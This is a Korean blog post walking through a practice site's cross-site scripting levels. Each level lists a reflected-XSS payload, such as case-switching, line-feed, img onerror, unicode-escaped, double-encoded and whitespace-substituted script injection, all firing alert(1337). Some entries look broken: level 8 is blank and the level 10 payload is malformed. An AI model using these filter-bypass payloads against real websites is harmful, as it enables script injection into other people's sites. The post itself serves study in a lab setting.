2020. 9. 11. 10:48ㆍHacking/Pentest Sites
level1
?name=<script>alert(%271337%27)</script>
level2
?name=<Script>alert(%271337%27)</Script>
level3
?name=zxm%0a<script>alert(1337)</script>
%0A : Line Feed
level4
img 태그 이용
?img=x%27%20onerror=%27alert(1377)
level5
?name=zxm&action=javascript:alert(1337)
level6
<, > 필터링 우회
?name=zxm\u003cscript\u003ealert(1337)\u003c/script\u003e
\u003c : 유니코드로 <
\u003e : 유니코드로 >
번역하면
?name=zxm<script>alert(1337)</script>
level7
double encording
?name=zxm%253cscript%253ealert%25281337%2529%253c%252fscript%253e
'<' ----%encording---> '%3c' ----%encording---> '%253c'
'>' ----%encording---> '%3e' ----%encording---> '%253e'
번역하면
?name=zxm<script>alert(1337)</script>
level8
level9
white space 우회
?name=<script%09src=data:text/javascript,alert(1337)></script>
[white space 우회 방법]
1) Tab : %09
2) Line Feed : %0a
3) Caraage Return : %0d
4) comment : /**/
5) parentheses : ()
6) add : +
번역하면
?name=<script src=data:text/javascript,alert(1337)></script>
level10
?name=\u003cscript\u003eeval.call\'${\u022alert\u00281337\u0029]u0022}\'\u003c/script\u003e'
\u003c : 유니코드로 <
\u003e : 유니코드로 >
\u0022 : "
\u0028 : (
\u0029 : )
eval() 함수 : 인자로 들어온 문자열을 코드로 인식하는 함수
번역하면
?name=<script>eval.call\'${"alert(1337)"}\'<script>
참고 사이트 :
zixem.altervista.org/www.zixem.altervista.org/XSS/8.php?name=zxm
'Hacking > Pentest Sites' 카테고리의 다른 글
매체제어 우회 - 명령프롬프트 부팅 (0) | 2021.06.16 |
---|---|
[DVWA] Autoset을 이용한 DVWA 웹서버 구축 (0) | 2020.10.29 |
'파일업로드 취약점' 선정 시 유의사항 - 우회 업로드한 파일 확인 (0) | 2020.09.28 |